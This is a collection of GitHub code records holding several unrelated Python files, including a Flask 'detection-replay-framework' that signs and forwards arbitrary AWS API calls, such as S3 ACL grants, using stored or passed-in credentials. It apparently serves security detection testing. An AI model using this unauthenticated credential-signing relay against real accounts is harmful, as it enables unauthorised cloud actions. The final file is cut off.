duration_between: float = 0.0,\n reverse_second_lobe: bool = False):\n grad_instance = cls()\n grad_instance.system = system\n duration_lobe = grad_instance.set_on_raster(float(duration_lobe))\n duration_between = grad_instance.set_on_raster(duration_between)\n\n grad_ns = pp.make_trapezoid(\n channel=channel, area=area_lobe, amplitude=amplitude_lobe, duration=duration_lobe, system=system\n )\n\n # set up arrays\n grad_instance.t_delay_s = pre_delay\n times = np.array([\n 0.0,\n grad_ns.rise_time,\n grad_ns.rise_time + grad_ns.flat_time,\n duration_lobe,\n duration_lobe + duration_between,\n duration_lobe + duration_between + grad_ns.rise_time,\n duration_lobe + duration_between + grad_ns.rise_time + grad_ns.flat_time,\n 2 * duration_lobe + duration_between,\n ])\n # for second lobe\n sign = 1\n if reverse_second_lobe:\n sign *= -1\n amps = np.array([\n 0.0,\n grad_ns.amplitude,\n grad_ns.amplitude,\n 0.0,\n 0.0,\n sign * grad_ns.amplitude,\n sign * grad_ns.amplitude,\n 0.0\n ])\n\n areas = [grad_ns.area, 0, sign * grad_ns.area]\n\n grad_instance.channel = channel\n grad_instance.amplitude = np.array(amps)\n grad_instance.area = np.array(areas)\n\n grad_instance.t_array_s = times\n grad_instance.t_fall_time_s = times[-1] - times[-2]\n grad_instance.t_rise_time_s = times[1] - times[0]\n\n grad_instance.system = system\n\n grad_instance.max_slew = system.max_slew\n grad_instance.max_grad = system.max_grad\n grad_instance.t_duration_s = grad_instance.get_duration()\n # last sanity check max grad / slew times\n if np.max(np.abs(amps)) > system.max_grad:\n err = f\"amplitude violation, maximum gradient exceeded\"\n logModule.error(err)\n raise ValueError(err)\n grad_slew = np.abs(np.diff(amps) / np.diff(times))\n if np.max(grad_slew) > system.max_slew:\n err = f\"slew rate violation, maximum slew rate exceeded\"\n logModule.error(err)\n raise ValueError(err)\n return grad_instance\n\n def get_duration(self):\n # 0 for empty init grad\n t = self.t_delay_s\n if self.t_array_s.__len__() < 1:\n return t\n return t + self.t_array_s[-1]\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n channel=self.channel, type='grad',\n delay=self.t_delay_s, first=self.amplitude[0], last=self.amplitude[-1],\n shape_dur=self.t_duration_s, tt=self.t_array_s, waveform=self.amplitude\n )\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n gamma = self.system.gamma\n amplitude = self.amplitude / gamma * 1e3\n ax.plot(self.t_array_s * 1e3, amplitude)\n ax.set_xlabel(\"time [ms]\")\n ax.set_ylabel(\"grad amp [mT/m]\")\n plt.show()\n\n def calculate_asym_area(self, forward: bool = True):\n amps = self.amplitude\n times = self.t_array_s\n if not forward:\n amps = amps[::-1]\n times = times[::-1]\n amplitude_a = amps[1]\n amplitude_b = amps[3]\n delta_t = np.abs(np.diff(times))[:3]\n factor = np.array([0.5, 1.0, 0.5])\n area = amplitude_a * np.sum(factor * delta_t) + amplitude_b * delta_t[2] / 2\n return area\n\n\nclass ADC(Event):\n def __init__(self):\n super().__init__()\n self.num_samples: int = 0\n\n self.t_dwell_s: float = 0.0\n self.t_delay_s: float = 0.0\n self.t_duration_s: float = 0.0\n self.t_dead_time_s: float = 0.0\n\n self.freq_offset_hz: float = 0.0\n self.phase_offset_rad: float = 0.0\n\n self.system: pp.Opts = pp.Opts()\n\n @classmethod\n def make_adc(cls, system: pp.Opts,\n num_samples: int = 0, delay_s: float = 0, duration_s: float = 0,\n dwell: float = 0, freq_offset_hz: float = 0, phase_offset_rad: float = 0.0\n ):\n adc_ns = pp.make_adc(\n num_samples=num_samples,\n delay=delay_s,\n duration=duration_s,\n dwell=dwell,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad,\n system=system\n )\n adc_instance = cls()\n adc_instance.system = system\n adc_instance.num_samples = adc_ns.num_samples\n adc_instance.t_delay_s = adc_ns.delay\n adc_instance.t_dwell_s = adc_ns.dwell\n adc_instance.t_duration_s = adc_ns.dwell * adc_ns.num_samples\n adc_instance.t_dead_time_s = adc_ns.dead_time\n adc_instance.freq_offset_hz = adc_ns.freq_offset\n adc_instance.phase_offset_rad = adc_ns.phase_offset\n adc_instance.set_on_raster()\n return adc_instance\n\n def get_duration(self):\n return self.t_duration_s + self.t_delay_s\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n dead_time=self.t_dead_time_s, delay=self.t_delay_s, dwell=self.t_dwell_s,\n freq_offset=self.freq_offset_hz, num_samples=self.num_samples,\n phase_offset=self.phase_offset_rad, type='adc'\n )\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n amplitude = np.array([0, 0, 1, 1, 0])\n times = np.array(\n [0, self.t_delay_s - 1e-9, self.t_delay_s + 1e-9, self.get_duration() - 1e-9, self.get_duration() + 1e-9])\n ax.plot(times * 1e3, amplitude)\n ax.set_xlabel(\"time [ms]\")\n ax.set_ylabel(\"ADC\")\n plt.show()\n\n def set_on_raster(self):\n raster_time = float(self.system.adc_raster_time)\n to_set = [\"t_dwell_s\", \"t_delay_s\", \"t_duration_s\"]\n # save number of samples\n n = int(self.t_duration_s / self.t_dwell_s)\n for key in to_set:\n value = self.__getattribute__(key)\n if np.abs(value) % raster_time > 1e-9:\n rastered_value = np.ceil(value / raster_time) * raster_time\n self.__setattr__(key, rastered_value)\n if key == \"t_dwell_s\":\n # if dwell changed adopt\n self.t_duration_s = n * self.t_dwell_s\n\n\nclass DELAY(Event):\n def __init__(self):\n super().__init__()\n self.system = pp.Opts()\n\n @classmethod\n def make_delay(cls, delay: float, system: pp.Opts = pp.Opts()):\n delay_instance = cls()\n delay_instance.system = system\n delay_instance.t_duration_s = delay\n delay_instance.set_on_block_raster()\n return delay_instance\n\n def check_on_block_raster(self) -> bool:\n us_raster = 1e6 * self.system.grad_raster_time\n us_value = 1e6 * self.t_duration_s\n if us_value % us_raster < 1e-4:\n rastered_value = us_value * 1e-6\n else:\n rastered_value = np.round(us_value / us_raster) * us_raster\n if np.abs(rastered_value - self.t_duration_s) > 1e-8:\n return False\n else:\n return True\n\n def set_on_block_raster(self):\n us_raster = 1e6 * self.system.grad_raster_time\n us_value = 1e6 * self.t_duration_s\n if us_value % us_raster < 1e-4:\n rastered_value = us_value\n else:\n rastered_value = int(np.ceil(us_value / us_raster) * us_raster)\n self.t_duration_s = rastered_value * 1e-6\n\n def get_duration(self):\n return self.t_duration_s\n\n def to_simple_ns(self):\n return types.SimpleNamespace(delay=self.t_duration_s, type='delay')\n\n\nif __name__ == '__main__':\n rf = pp.make_sinc_pulse(\n np.pi / 2,\n system=pp.Opts(),\n use='excitation'\n )\n rf_new = RF.make_sinc_pulse(\n flip_angle_rad=np.pi / 2,\n pulse_type='excitation',\n system=pp.Opts()\n )\n rf_new_ns = rf_new.to_simple_ns()\n logModule.info(\"compare rf\")\n\n grad_ns = pp.make_extended_trapezoid(\n 'z',\n amplitudes=np.array([0, 755857.8987, 755857.8987, 0]),\n times=np.array([0, 0.00011, 0.00189, 0.002])\n )\n grad_new = GRAD.make_trapezoid('z', system=pp.Opts(), area=1 / 0.7 * 1e3, duration_s=2e-3)\n grad_new_ns = grad_new.to_simple_ns()\n logModule.info(\"compare grad\")\n\n adc_ns = pp.make_adc(num_samples=304, duration=3e-3)\n adc_new = ADC.make_adc(system=pp.Opts(), num_samples=304, duration_s=3e-3)\n adc_new_ns = adc_new.to_simple_ns()\n\n logModule.info(\"compare adc\")\n\n delay_ns = pp.make_delay(1e-3)\n delay_new = DELAY.make_delay(1e-3)\n\n logModule.info(\"compare delays\")\n","repo_name":"schmidtijoe/jstmc","sub_path":"jstmc/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":32586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18529504261","text":"import csv\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nfig, ax =plt.subplots()\n\nfilename = 'sitka_weather_2018_full.csv'\nwith open(filename) as f:\n\treader = csv.reader(f)\n\theader_row = next(reader)\n\tdates, highs ,lows = [] ,[], []\n\tfor row in reader:\n\t\tcurrent_date = datetime.strptime(row[2], '%d/%m/%Y')\n\t\thigh = int(row[8])\n\t\tlow = int(row[9])\n\t\thighs.append(high)\n\t\tlows.append(low)\n\t\tdates.append(current_date)\n\nax.plot(dates, highs, c ='red')\nax.plot(dates, lows, c='blue')\nax.set_title('Daily Temperatures(2018/19)',fontsize = 15)\nax.set_xlabel('Dates')\nax.set_ylabel('Temperatures (F)')\nax.tick_params(axis = 'both', which = 'major', labelsize = 10)\nax.fill_between(dates,highs, lows, facecolor = 'lightblue')\nfig.autofmt_xdate()\nplt.show()\n\n\n\n\n\n\t\t\n\t\t\n","repo_name":"KevinOti/Weather_viz_in_python","sub_path":"Matplotlib.py","file_name":"Matplotlib.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34607002184","text":"from sau import Sau\nfrom ulv import Ulv\nfrom spillbrett import Spillbrett\nfrom spillbrett import har_kollidert\nfrom gress import Gress\nfrom stein import Stein\n\ndef test_sau():\n sau = Sau(\"sau\", 10, 20)\n sau.sett_posisjon(0,0)\n sau.sett_fart(10,20)\n sau.beveg()\n sau.beveg()\n\n assert sau.hent_posisjon_venstre() == 20\n assert sau.hent_posisjon_topp() == 40\n\n sau.snu()\n\n assert sau.hent_fart_fra_venstre() == -10\n assert sau.hent_fart_fra_topp() == -20\n\n sau.beveg()\n\n assert sau.hent_posisjon_venstre() == 10\n assert sau.hent_posisjon_topp() == 20\n\ntest_sau()\n\ndef test_finn_naermeste_sau():\n brett = Spillbrett()\n brett.opprett_sau(\"sau\", 0, 0)\n brett.opprett_sau(\"sau\", 100, 100)\n ulv = brett.opprett_ulv(\"ulv\", 90, 80, brett)\n ulv = Ulv(\"ulv\", 90, 80, brett)\n ulv.finn_naermeste_sau(brett.hent_sauer())\n\ntest_finn_naermeste_sau()\n\ndef test_har_kollidert():\n # Test-case 1: Disse to objektene har kollidert, fordi ulven ligger delvis oppå sauen\n sau = Sau(\"sau\", 50, 50)\n ulv = Ulv(\"ulv\", 60, 60, brett=0)\n assert har_kollidert(sau, ulv)\n # Rekkefølgen skal ikke ha noe å si\n assert har_kollidert(ulv, sau)\n \n # Test-case 2: Disse to objektene ligger rett ved siden av hverandre \n # og har ikke kollidert (husk at de er 50px brede/høye):\n gress = Gress(\"gress\", 100, 100)\n sau = Sau(\"sau\", 150, 150)\n assert not har_kollidert(gress, sau)\n \n # Implementer to test-caser til her: \n sau = Sau(\"sau\", 0, 49)\n stein = Stein(\"stein\", 49, 0)\n assert har_kollidert(sau, stein)\n\n sau = Sau(\"sau\", 700, 0)\n ulv = Ulv(\"ulv\", 0, 0, 0)\n assert har_kollidert(sau, ulv)\n\ntest_har_kollidert()","repo_name":"Bsian02/uio","sub_path":"IN1000/Obliger/Uke 8 og 9 redo/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"no","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3950726629","text":"import play_csv\nimport string\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom gensim.models.word2vec import Word2Vec\nimport sys \nimport json\n\ntext = [sys.argv[1]]\nmovies = play_csv.play_csv()\n\n\ndef get_data_set():\n data_set = []\n for movie in movies:\n title = movie.get('Title')\n genres = movie.get('Genre')\n tags = movie.get('Tags')\n\n exclude = set(string.punctuation + string.digits)\n title = ''.join(ch for ch in title if ch not in exclude)\n\n for i in sent_tokenize(title):\n temp = []\n for j in word_tokenize(i):\n temp.append(j.lower())\n data_set.append(temp)\n\n for genre in genres:\n for i in sent_tokenize(genre):\n temp = []\n for j in word_tokenize(i):\n temp.append(j.lower())\n data_set.append(temp)\n\n for tag in tags:\n if tag is not None:\n for i in sent_tokenize(tag):\n temp = []\n for j in word_tokenize(i):\n temp.append(j.lower())\n data_set.append(temp)\n return data_set\n\n\ndef parse(user_input):\n exclude = set(string.punctuation)\n user_input = ''.join(ch for ch in user_input if ch not in exclude)\n temp = []\n for i in word_tokenize(user_input):\n temp.append(i.lower())\n return temp\n\n\ndef get_similarities(user_input):\n words = parse(user_input)\n data_set = get_data_set()\n cbow_model = Word2Vec(data_set, min_count=1, size=100, window=10)\n similarities = []\n for word in words:\n cbow_prediction = cbow_model.wv.most_similar(word, topn=1)\n syn = cbow_prediction[0][0]\n similarities.append(syn)\n return similarities\n\n\ndef get_recommendations(user_input):\n movies_recommendations = []\n similarities = get_similarities(user_input)\n for word in similarities:\n for movie in movies:\n title = movie.get('Title')\n genres = movie.get('Genre')\n tags = movie.get('Tags')\n if word in title or word in genres or word in tags:\n movies_recommendations.append(movie)\n sorted_movies = sorted(movies_recommendations, key=lambda j: j['Rating'], reverse=True)\n top_movies = []\n for i in range(10):\n top_movies.append(sorted_movies[i])\n print(json.dumps(top_movies))\n\n\nget_recommendations(text)\n","repo_name":"adriangotca98/MovieRecommender","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4811112369","text":"import socket\nimport random\nimport os\nimport pathlib\n\nfrom datetime import datetime\nfrom billiard import Process\n\nfrom ament_index_python.packages import get_package_prefix\nfrom launch import LaunchService, LaunchDescription\nfrom launch.actions.execute_process import ExecuteProcess\nfrom launch_ros.actions import Node\nfrom launch.actions import IncludeLaunchDescription, DeclareLaunchArgument, TimerAction, ExecuteProcess\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch.substitutions import Command, PathJoinSubstitution, LaunchConfiguration\nfrom ament_index_python import get_package_share_directory\nimport yaml\nfrom launch_ros.descriptions import ParameterValue\nimport time\nimport json\n\nimport gym_gazebo2\nfrom gym_gazebo2.utils import ut_generic\n\nMARA_PATH = \"/PATH/TO/MARA/WORKSPACE\" # TO BE MODIFIED\n\ndef startLaunchServiceProcess(launchDesc):\n \"\"\"Starts a Launch Service process. To be called from subclasses.\n\n Args:\n launchDesc : LaunchDescription obj.\n \"\"\"\n # Create the LauchService and feed the LaunchDescription obj. to it.\n launchService = LaunchService()\n launchService.include_launch_description(launchDesc)\n process = Process(target=launchService.run)\n #The daemon process is terminated automatically before the main program exits,\n # to avoid leaving orphaned processes running\n process.daemon = True\n process.start()\n\n return process\n\ndef isPortInUse(port):\n \"\"\"Checks if the given port is being used.\n\n Args:\n port(int): Port number.\n\n Returns:\n bool: True if the port is being used, False otherwise.\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socket1:\n return socket1.connect_ex(('localhost', port)) == 0\n\ndef getExclusiveNetworkParameters():\n \"\"\"Creates appropriate values for ROS_DOMAIN_ID and GAZEBO_MASTER_URI.\n\n Returns:\n Dictionary {ros_domain_id (string), ros_domain_id (string)}\n \"\"\"\n\n randomPortROS = random.randint(0, 230)\n randomPortGazebo = random.randint(10000, 15000)\n while isPortInUse(randomPortROS):\n print(\"Randomly selected port is already in use, retrying.\")\n randomPortROS = random.randint(0, 230)\n\n while isPortInUse(randomPortGazebo):\n print(\"Randomly selected port is already in use, retrying.\")\n randomPortGazebo = random.randint(10000, 15000)\n\n # Save network segmentation related information in a temporary folder.\n tempPath = '/tmp/gym-gazebo-2/running/'\n pathlib.Path(tempPath).mkdir(parents=True, exist_ok=True)\n\n # Remove old tmp files.\n ut_generic.cleanOldFiles(tempPath, \".log\", 2)\n\n filename = datetime.now().strftime('running_since_%H_%M__%d_%m_%Y.log')\n\n file = open(tempPath + '/' + filename, 'w+')\n file.write(filename + '\\nROS_DOMAIN_ID=' + str(randomPortROS) \\\n + '\\nGAZEBO_MASTER_URI=http://localhost:' + str(randomPortGazebo))\n file.close()\n\n return {'ros_domain_id':str(randomPortROS),\n 'gazebo_master_uri':\"http://localhost:\" + str(randomPortGazebo)}\n\ndef generateLaunchDescriptionDIANA(gzclient, multiInstance, port):\n \"\"\"\n Returns ROS2 LaunchDescription object.\n Args:\n realSpeed: bool True if RTF must be set to 1, False if RTF must be set to maximum.\n \"\"\"\n\n root_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../..'))\n\n print(\"\\n\\n\\n\\n\\n\\n Generating Launch Description DIANA\")\n\n os.environ['AMENT_PREFIX_PATH'] = f'{MARA_PATH}/install:/opt/ros/humble:{root_dir}/resources/tb2_ugv:{root_dir}/resources/rosbot_ugv:{root_dir}/resources/pic4rl_testing:{root_dir}/resources/pic4rl:{root_dir}/resources/jackal_ugv:{root_dir}/resources/husky_ugv:{root_dir}/resources/gazebo_sim:{root_dir}/resources/cheddar_ugv:/opt/ros/humble'\n\n\n installDir = get_package_prefix('mara_gazebo_plugins')\n print(\"installDir: \", installDir)\n \n\n if 'GAZEBO_MODEL_PATH' in os.environ:\n os.environ['GAZEBO_MODEL_PATH'] = os.environ['GAZEBO_MODEL_PATH'] + ':' + installDir \\\n + '/share'\n else:\n os.environ['GAZEBO_MODEL_PATH'] = installDir + \"/share\"\n\n if 'GAZEBO_PLUGIN_PATH' in os.environ:\n os.environ['GAZEBO_PLUGIN_PATH'] = os.environ['GAZEBO_PLUGIN_PATH'] + ':' + installDir \\\n + '/lib'\n else:\n os.environ['GAZEBO_PLUGIN_PATH'] = installDir + '/lib'\n\n if port != 11345: # Default gazebo port\n os.environ[\"ROS_DOMAIN_ID\"] = str(port)\n os.environ[\"GAZEBO_MASTER_URI\"] = \"http://localhost:\" + str(port)\n print(\"******* Manual network segmentation *******\")\n print(\"ROS_DOMAIN_ID=\" + os.environ['ROS_DOMAIN_ID'])\n print(\"GAZEBO_MASTER_URI=\" + os.environ['GAZEBO_MASTER_URI'])\n print(\"\")\n elif multiInstance:\n # Exclusive network segmentation, which allows to launch multiple instances of ROS2+Gazebo\n networkParams = getExclusiveNetworkParameters()\n os.environ[\"ROS_DOMAIN_ID\"] = networkParams.get('ros_domain_id')\n os.environ[\"GAZEBO_MASTER_URI\"] = networkParams.get('gazebo_master_uri')\n print(\"******* Exclusive network segmentation *******\")\n print(\"ROS_DOMAIN_ID=\" + networkParams.get('ros_domain_id'))\n print(\"GAZEBO_MASTER_URI=\" + networkParams.get('gazebo_master_uri'))\n print(\"\")\n\n try:\n envs = {}\n for key in os.environ.__dict__[\"_data\"]:\n key = key.decode(\"utf-8\")\n if key.isupper():\n envs[key] = os.environ[key]\n except BaseException as exception:\n print(\"Error with Envs: \" + str(exception))\n return None\n \n print(\"Envs: \", envs)\n \n\n # Gazebo visual interface. GUI/no GUI options.\n if gzclient:\n gazeboCmd = \"gazebo\"\n else:\n gazeboCmd = \"gzserver\"\n\n print(\"gazeboCmd: \", gazeboCmd)\n \n ## Creation of ROS2 LaunchDescription obj.\n\n # Fetching Simulation Parameters from config file in gazebo_sim/config/sim_params.yaml\n # This file only contains the name of the package that contains the main_params.yaml\n simulation_configFilepath = os.path.join(\n get_package_share_directory(\"gazebo_sim\"), 'config',\n 'sim_params.yaml'\n )\n print(\"simulation_configFilepath: \", simulation_configFilepath)\n \n # Read the package name from the config file\n with open(simulation_configFilepath, 'r') as file:\n mode_package = yaml.safe_load(file)['sim_parameters'][\"package_name\"]\n # mode_package: pic4rl\n print(\"mode_package: \", mode_package)\n \n # Fetching Main Parameters from config file in pic4rl/config/main_params.yaml\n configFilepath = os.path.join(\n get_package_share_directory(mode_package), 'config',\n 'main_params.yaml'\n )\n print(\"configFilepath: \", configFilepath)\n \n # Read the parameters from the config file\n with open(configFilepath, 'r') as file:\n configParams = yaml.safe_load(file)['main_node']['ros__parameters']\n print(\"configParams: \", configParams)\n \n # Fetching Goals and Poses from config file in pic4rl/goals_and_poses/new_indoor.json\n goals_path = os.path.join(\n get_package_share_directory(mode_package), \n 'goals_and_poses', \n configParams['data_path']\n )\n print(\"goals_path: \", goals_path)\n \n goal_and_poses = json.load(open(goals_path,'r'))\n print(\"goal_and_poses: \", goal_and_poses)\n \n robot_pose, goal_pose = goal_and_poses[\"initial_pose\"], goal_and_poses[\"goals\"][0]\n print(\"robot_pose: \", robot_pose)\n print(\"goal_pose: \", goal_pose)\n \n x_rob = '-x '+str(robot_pose[0])\n y_rob = '-y '+str(robot_pose[1])\n z_rob = '-z '+str(0.3) \n yaw_rob = '-Y ' +str(robot_pose[2])\n\n x_goal = '-x '+str(goal_pose[0])\n y_goal = '-y '+str(goal_pose[1])\n\n # Fetching Robot Package Name from config file in pic4rl/config/main_params.yaml\n robot_pkg = get_package_share_directory(configParams[\"robot_name\"])\n print(\"robot_pkg: \", robot_pkg) \n\n # Fetching Goal Entity from config file in gazebo_sim/models/goal_box/model.sdf\n goal_entity = os.path.join(get_package_share_directory(\"gazebo_sim\"), 'models', \n 'goal_box', 'model.sdf')\n print(\"goal_entity: \", goal_entity)\n \n # For now we use a fixed world file\n worldPath = f\"{root_dir}/environments/gym-gazebo2/gym_gazebo2/worlds/marsyard_ERC23.world\"\n print(\"worldPath: \", worldPath)\n \n\n use_sim_time_arg = DeclareLaunchArgument(\n 'use_sim_time',\n default_value = \"true\",\n description = 'Use simulation clock if true')\n print(\"use_sim_time_arg: \", use_sim_time_arg)\n \n robot_description = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n \t\tos.path.join(robot_pkg,'launch', 'description.launch.py')\n )\n )\n print(\"robot_description: \", robot_description)\n \n spawn_robot = Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n output='screen',\n arguments=['-entity',configParams[\"robot_name\"], x_rob, y_rob, z_rob, yaw_rob, '-topic','/robot_description'],\n )\n print(\"spawn_robot: \", spawn_robot)\n\n spawn_goal = Node(\n package='gazebo_ros',\n executable='spawn_entity.py',\n output='screen',\n arguments=['-entity', 'goal', '-file', goal_entity, x_goal, y_goal]\n )\n print(\"spawn_goal: \", spawn_goal)\n \n gazebo = ExecuteProcess(\n cmd=[gazeboCmd,'--verbose', worldPath, '-s','libgazebo_ros_init.so','-s','libgazebo_ros_factory.so'],\n output='screen',\n env=envs\n )\n print(\"gazebo: \", gazebo)\n \n launchDesc = LaunchDescription([\n use_sim_time_arg,\n robot_description,\n spawn_robot,\n spawn_goal,\n TimerAction(period=0., actions=[gazebo]),\n ])\n print(\"launchDesc: \", launchDesc)\n \n print(\"LaunchDescription generated.\")\n return launchDesc\n\ndef launchReal():\n os.environ[\"ROS_DOMAIN_ID\"] = str(22)\n #os.environ[\"RMW_IMPLEMENTATION\"] = \"rmw_opensplice_cpp\"\n os.environ[\"RMW_IMPLEMENTATION\"] = \"rmw_fastrtps_cpp\"\n installDir = get_package_prefix('mara_gazebo_plugins')\n launchDesc = LaunchDescription([\n Node(package='hros_cognition_mara_components',\n node_executable='hros_cognition_mara_components',\n arguments=[\"-motors\", installDir \\\n + \"/share/hros_cognition_mara_components/motors.yaml\", \"real\"], output='screen')\n ])\n return launchDesc\n","repo_name":"Anatr1/DIANA-Gym","sub_path":"environments/gym-gazebo2/gym_gazebo2/utils/ut_launch.py","file_name":"ut_launch.py","file_ext":"py","file_size_in_byte":10475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"34725060831","text":"from email import header\nimport os\nimport base64\nimport hashlib\nfrom flask import Flask, json, request, abort, jsonify\nfrom requests_aws4auth import AWS4Auth\nfrom requests_aws4auth import PassiveAWS4Auth\nimport requests as requests\nimport xmltodict\nfrom xml.parsers.expat import ExpatError\n\napp = Flask(__name__)\n\n\n@app.route('/submitRequest', methods=['POST'])\ndef validate_post():\n data = request.json\n if 'HOST' not in data:\n abort(400, description='missing HOST')\n elif 'REGION' not in data:\n abort(400, description='missing REGION')\n elif 'SERVICE' not in data:\n abort(400, description='missing SERVICE')\n elif 'ENDPOINT' not in data:\n abort(400, description='missing ENDPOINT')\n elif 'VERB' not in data:\n abort(400, description='missing VERB')\n else:\n return submit_request(), 200, {'Content-Type': 'application/json; charset=utf-8'}\n\n#return errors as JSON, otherwise it would be HTML\n@app.errorhandler(400)\ndef bad_request(message):\n return jsonify(error=str(message)), 400\n\n\ndef submit_request():\n data = request.json\n\n## Baseline Headers\n headers = {\n 'User-Agent': data['UA'] if 'UA' in data else 'detection-replay-framework',\n 'Connection': 'close', \n 'Accept-Encoding': 'gzip, deflate',\n 'Host': data['HOST']\n }\n\n## Assign the Content-Type Header for PUT and POST requests\n headers['Content-Type'] = data['CONTENT'] if 'CONTENT' in data else print(\"no CONTENT parameter provided\")\n\n\n## Handle setting the Body for PUT and POST requests\n body = data['BODY'] if 'BODY' in data else ''\n\n\n## Set the TARGET Header for unique AWS services which use this value for routing.\n headers['X-Amz-Target'] = data['TARGET'] if 'TARGET' in data else print(\"no TARGET parameter provided\")\n\n# S3 Configurations\n## Assign S3 headers during copy events.\n headers['x-amz-copy-source'] = data['SOURCEBUCKET'] if 'SOURCEBUCKET' in data else print(\"no SOURCEBUCKET parameter provided\")\n\n\n## Assign headers associated with the assignment of canned ACLs\n headers['x-amz-acl'] = data['ACL'] if 'ACL' in data else ''\n\n\n## Assign headers associated with non-cannned, grantee ACLs.\n headers['x-amz-grant-read'] = data['GRANTREADACL'] if 'GRANTREADACL' in data else print(\"no GRANTREADACL parameter provided\")\n headers['x-amz-grant-write'] = data['GRANTWRITEACL'] if 'GRANTWRITEACL' in data else print(\"no GRANTWRITEACL parameter provided\")\n headers['x-amz-grant-full-control'] = data['GRANTFULLACL'] if 'GRANTFULLACL' in data else print(\"no GRANTFULLACL parameter provided\") \n\n## Handle headers associated with KMS encryption.\n headers['x-amz-server-side-encryption'] = data['SSE'] if 'SSE' in data else print(\"no SSE parameter provided\")\n headers['x-amz-server-side-encryption-aws-kms-key-id'] = data['KMS-KEY-ID'] if 'KMS-KEY-ID' in data else print(\"no KMS-KEY-ID parameter provided\")\n\n## Assign and calculate headers for MD5 digest - only required in a handful of S3 calls.\n if 'MD5' in data:\n contents = body\n md = hashlib.md5(contents.encode('utf-8')).digest()\n contents_md5 = base64.b64encode(md).decode('utf-8')\n headers['Content-MD5'] = contents_md5\n else:\n print(\"no MD5 digest header required or included\")\n\n\n## Handle the 'USER' parameter so the detection can be run as different users\n try:\n if 'USER' in data:\n print(\"Accessing keys for user specified in 'user' parameter\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID_' + data['USER']]\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY_' + data['USER']]\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE']) \n if 'MD5' in data:\n print(\"elif MD5 in data\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID_' + data['USER']]\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY_' + data['USER']]\n hdrs = set({'host', 'content-type', 'date', 'x-amz-*', 'content-md5'})\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'], include_hdrs=hdrs) \n if 'USER' not in data:\n print(\"Accessing keys for default user with ELSE block\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID']\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'])\n except:\n print(\"specified user does not exists, deprovision them before re-provisioning\")\n auth = None\n\n\n## Handle the passing of temporary session credentials directly to the app so the detection can be \n## run as a role on the fly\n\n try:\n if data['TEMPCREDSPASSED'] == \"yes\":\n print(\"if TEMPCREDSPASSED == YES\")\n accessKeyId = data['ACCESSKEYID']\n accessKeySecret = data['ACCESSKEYSECRET']\n accessKeySessionToken = data['SESSIONTOKEN']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'], session_token=accessKeySessionToken)\n else:\n print(\"if TEMPCREDSPASSED else\")\n accessKeyId = os.environ['AWS_ACCESS_KEY_ID']\n accessKeySecret = os.environ['AWS_SECRET_ACCESS_KEY']\n auth = AWS4Auth(accessKeyId,accessKeySecret, data['REGION'], data['SERVICE'])\n except:\n print(\"if TEMPCREDSPASSED except\")\n \n\n\n## POST HTTP Requests\n if data['VERB'] == 'POST':\n\n response = requests.post(data['ENDPOINT'], data=body, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n jsonResponse = response.json()\n except:\n print(\"In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n print(\"In TRY block 3\")\n jsonResponse = xmltodict.parse(response.text)\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 3\")\n jsonResponse = str(response.text.strip())\n else:\n try:\n print(\"In TRY block 4\")\n jsonResponse = json.dumps(xmltodict.parse(response.text))\n except (xmltodict.ParsingInterrupted, ExpatError):\n print(\"In except block 4\")\n jsonResponse = str(response.text.strip())\n\n\n\n\n\n## PUT HTTP Requests\n elif data['VERB'] == 'PUT':\n\n response = requests.put(data['ENDPOINT'], data=body, headers=headers, auth=auth)\n print(response.request)\n responseHeaders = response.headers\n print(responseHeaders)\n contentType = responseHeaders['content-type'] if 'content-type' in responseHeaders else ''\n\n if \"application/json\" in contentType:\n try:\n print(\"PUT: In TRY block 1\")\n jsonResponse = response.json()\n except:\n print(\"PUT: In except block 1\")\n jsonResponse = json.dumps({})\n elif \"x-amz-json-1.1\" in contentType:\n try:\n print(\"PUT: In TRY block 2\")\n jsonResponse = response.json()\n except:\n print(\"PUT: In except block 2\")\n jsonResponse = json.dumps({})\n elif \"text/xml\" in contentType:\n try:\n 